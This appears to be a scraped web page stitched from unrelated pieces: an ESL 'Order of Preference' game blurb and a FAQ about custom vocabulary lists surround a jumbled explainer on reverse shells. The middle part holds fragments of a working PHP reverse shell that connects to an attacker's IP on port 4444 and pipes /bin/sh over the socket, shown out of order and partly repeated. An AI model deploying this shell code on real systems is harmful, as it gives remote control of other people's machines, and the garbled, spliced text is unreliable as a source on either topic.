In the Order Of Preference ESL game, students have to guess how their partner would rank five items on the board.

What is a Reverse Shell? A reverse shell is a type of shell session where the target machine initiates a connection back to an attacker's machine. Unlike a "bind shell" (where the target opens a listening port), a reverse shell bypasses common firewall rules that block inbound connections but allow outbound traffic.
// Redirect STDIN, STDOUT, STDERR to the socket shell_exec('/bin/sh -i <&3 >&3 2>&3'); ?> Reverse Shell Php
<?php set_time_limit(0); $ip = '192.168.1.100'; // Attacker's IP $port = 4444; // Attacker's port $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("Error: $errstr ($errno)\n"); What is a Reverse Shell
Stay curious, stay legal, and always get permission before testing. $ip = '192.168.1.100'
How do I create my own vocabulary list for this game?
You can now create custom word sets for our interactive game at: https://eslactive.com/interactive/password-game/ (in the “Custom Input (Optional)” box). Custom word sets for Password will also now appear in your account under “My Custom Inputs”.
Thanks for the request, hope that helps!